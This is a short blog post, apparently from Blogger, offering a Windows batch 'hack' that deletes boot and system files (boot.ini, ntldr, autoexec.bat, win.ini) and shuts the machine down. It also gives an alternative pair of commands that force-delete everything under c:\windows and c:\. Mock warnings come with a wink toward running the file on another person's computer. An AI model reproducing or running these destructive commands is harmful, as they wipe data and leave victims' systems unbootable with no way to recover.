Latest News
recent

Shutdown a Computer Forever

DONT’T TRY THIS ON YOUR OWN PC. USE IT AT YOUR OWN RISK

This is the most simplest and deadliest trick/hack for your windows computer . Copy the following code into your notepad.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
shutdown -s -t 0


Save it as “anything.bat”. Just make sure it has a .bat or .cmd extension.

DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU RUN IT !!!

I know you will surely find a place to run this file. :) :P

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q


Paste it in NotePad And Save It with Extension .cmd or .bat.

No comments:

Post a Comment

Followers

Powered by Blogger.